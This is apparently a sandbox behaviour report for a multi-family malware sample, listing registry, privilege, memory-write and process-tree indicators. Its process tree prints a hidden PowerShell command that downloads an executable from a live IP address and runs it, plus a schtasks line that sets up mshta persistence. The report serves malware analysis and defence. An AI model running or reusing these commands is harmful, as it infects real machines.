description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tgvazx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4c8c26e4ba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kW3p2yUtCo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e2bf8bc9ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c3842a84fc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 272.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UU0LfLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Constraints.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dc6b7a79b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9b5f01d4a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Amadey.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b07dfdddb1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3d6c756052.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 522e881ea4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 272.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 4452 timeout.exe 672 timeout.exe 16140 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 5752 taskkill.exe 4724 taskkill.exe 4480 taskkill.exe 2076 taskkill.exe 2712 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings rapes.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6016 schtasks.exe 1860 schtasks.exe 3804 schtasks.exe 6508 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1100 powershell.exe 1100 powershell.exe 3128 TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE 3128 TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE 2816 rapes.exe 2816 rapes.exe 2712 powershell.exe 2712 powershell.exe 5588 kW3p2yUtCo.exe 5588 kW3p2yUtCo.exe 5588 kW3p2yUtCo.exe 5588 kW3p2yUtCo.exe 5528 powershell.exe 5528 powershell.exe 5528 powershell.exe 3168 rapes.exe 3168 rapes.exe 5332 MSBuild.exe 5332 MSBuild.exe 5332 MSBuild.exe 5332 MSBuild.exe 6032 MSBuild.exe 6032 MSBuild.exe 4912 powershell.exe 4912 powershell.exe 4912 powershell.exe 1744 powershell.exe 1744 powershell.exe 1744 powershell.exe 4944 MSBuild.exe 4944 MSBuild.exe 4944 MSBuild.exe 4944 MSBuild.exe 4020 powershell.exe 4020 powershell.exe 4020 powershell.exe 6032 MSBuild.exe 6032 MSBuild.exe 4892 chrome.exe 4892 chrome.exe 920 powershell.exe 920 powershell.exe 920 powershell.exe 2448 MSBuild.exe 2448 MSBuild.exe 2448 MSBuild.exe 2448 MSBuild.exe 1496 powershell.exe 1496 powershell.exe 1496 powershell.exe 6032 MSBuild.exe 6032 MSBuild.exe 2068 TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE 2068 TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE 6032 MSBuild.exe 6032 MSBuild.exe 4776 c3842a84fc.exe 4776 c3842a84fc.exe 3028 MSBuild.exe 3028 MSBuild.exe 3028 MSBuild.exe 3028 MSBuild.exe 4776 c3842a84fc.exe 4776 c3842a84fc.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 656 Process not Found 656 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 5768 msedge.exe 5768 msedge.exe 2372 msedge.exe 2372 msedge.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 3784 3FKgMSQ1MX.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 5584 7q8Wm5h.exe Token: SeDebugPrivilege 5528 powershell.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeDebugPrivilege 4020 powershell.exe Token: SeShutdownPrivilege 4892 chrome.exe Token: SeCreatePagefilePrivilege 4892 chrome.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeShutdownPrivilege 4892 chrome.exe Token: SeCreatePagefilePrivilege 4892 chrome.exe Token: SeShutdownPrivilege 4892 chrome.exe Token: SeCreatePagefilePrivilege 4892 chrome.exe Token: SeShutdownPrivilege 4892 chrome.exe Token: SeCreatePagefilePrivilege 4892 chrome.exe Token: SeShutdownPrivilege 4892 chrome.exe Token: SeCreatePagefilePrivilege 4892 chrome.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeShutdownPrivilege 4892 chrome.exe Token: SeCreatePagefilePrivilege 4892 chrome.exe Token: SeShutdownPrivilege 4892 chrome.exe Token: SeCreatePagefilePrivilege 4892 chrome.exe Token: SeDebugPrivilege 2480 tasklist.exe Token: SeDebugPrivilege 2416 tasklist.exe Token: SeDebugPrivilege 4016 IsValueCreated.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3128 TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 4892 chrome.exe 2612 e2bf8bc9ca.exe 2612 e2bf8bc9ca.exe 2612 e2bf8bc9ca.exe 5768 msedge.exe 5564 Constraints.com 5564 Constraints.com 5564 Constraints.com 2372 msedge.exe -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2612 e2bf8bc9ca.exe 2612 e2bf8bc9ca.exe 2612 e2bf8bc9ca.exe 5564 Constraints.com 5564 Constraints.com 5564 Constraints.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 808 wrote to memory of 1912 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 808 wrote to memory of 1912 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 808 wrote to memory of 1912 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 808 wrote to memory of 5944 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 808 wrote to memory of 5944 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 808 wrote to memory of 5944 808 2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 1912 wrote to memory of 1860 1912 cmd.exe 89 PID 1912 wrote to memory of 1860 1912 cmd.exe 89 PID 1912 wrote to memory of 1860 1912 cmd.exe 89 PID 5944 wrote to memory of 1100 5944 mshta.exe 91 PID 5944 wrote to memory of 1100 5944 mshta.exe 91 PID 5944 wrote to memory of 1100 5944 mshta.exe 91 PID 1100 wrote to memory of 3128 1100 powershell.exe 98 PID 1100 wrote to memory of 3128 1100 powershell.exe 98 PID 1100 wrote to memory of 3128 1100 powershell.exe 98 PID 3128 wrote to memory of 2816 3128 TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE 99 PID 3128 wrote to memory of 2816 3128 TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE 99 PID 3128 wrote to memory of 2816 3128 TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE 99 PID 2816 wrote to memory of 3528 2816 rapes.exe 103 PID 2816 wrote to memory of 3528 2816 rapes.exe 103 PID 3528 wrote to memory of 4048 3528 Mbxp0H9.exe 104 PID 3528 wrote to memory of 4048 3528 Mbxp0H9.exe 104 PID 3528 wrote to memory of 4048 3528 Mbxp0H9.exe 104 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 3528 wrote to memory of 5036 3528 Mbxp0H9.exe 105 PID 5036 wrote to memory of 3784 5036 MSBuild.exe 106 PID 5036 wrote to memory of 3784 5036 MSBuild.exe 106 PID 5036 wrote to memory of 5588 5036 MSBuild.exe 108 PID 5036 wrote to memory of 5588 5036 MSBuild.exe 108 PID 5036 wrote to memory of 5588 5036 MSBuild.exe 108 PID 3784 wrote to memory of 5432 3784 3FKgMSQ1MX.exe 109 PID 3784 wrote to memory of 5432 3784 3FKgMSQ1MX.exe 109 PID 2816 wrote to memory of 5584 2816 rapes.exe 110 PID 2816 wrote to memory of 5584 2816 rapes.exe 110 PID 2816 wrote to memory of 4868 2816 rapes.exe 111 PID 2816 wrote to memory of 4868 2816 rapes.exe 111 PID 2816 wrote to memory of 4868 2816 rapes.exe 111 PID 4868 wrote to memory of 2712 4868 cmd.exe 113 PID 4868 wrote to memory of 2712 4868 cmd.exe 113 PID 4868 wrote to memory of 2712 4868 cmd.exe 113 PID 2712 wrote to memory of 4884 2712 powershell.exe 114 PID 2712 wrote to memory of 4884 2712 powershell.exe 114 PID 2712 wrote to memory of 4884 2712 powershell.exe 114 PID 4884 wrote to memory of 3408 4884 cmd.exe 116 PID 4884 wrote to memory of 3408 4884 cmd.exe 116 PID 4884 wrote to memory of 3408 4884 cmd.exe 116 PID 2816 wrote to memory of 4796 2816 rapes.exe 120 PID 2816 wrote to memory of 4796 2816 rapes.exe 120 PID 2816 wrote to memory of 4796 2816 rapes.exe 120 PID 4796 wrote to memory of 652 4796 apple.exe 121 PID 4796 wrote to memory of 652 4796 apple.exe 121 PID 4796 wrote to memory of 652 4796 apple.exe 121 PID 652 wrote to memory of 5080 652 272.exe 123 PID 652 wrote to memory of 5080 652 272.exe 123 PID 5080 wrote to memory of 3524 5080 cmd.exe 125 PID 5080 wrote to memory of 3524 5080 cmd.exe 125 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn SVRGMmawHkw /tr "mshta C:\Users\Admin\AppData\Local\Temp\rAQDUTUMO.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn SVRGMmawHkw /tr "mshta C:\Users\Admin\AppData\Local\Temp\rAQDUTUMO.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1860
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\rAQDUTUMO.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE"C:\Users\Admin\AppData\Local\TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe"C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4048
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Users\Admin\AppData\Roaming\3FKgMSQ1MX.exe"C:\Users\Admin\AppData\Roaming\3FKgMSQ1MX.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Users\Admin\AppData\Roaming\3FKgMSQ1MX.exe"C:\Users\Admin\AppData\Roaming\3FKgMSQ1MX.exe" h9⤵
- Executes dropped EXE
PID:5432
-
-
-
C:\Users\Admin\AppData\Roaming\kW3p2yUtCo.exe"C:\Users\Admin\AppData\Roaming\kW3p2yUtCo.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5588
-
-
-
-
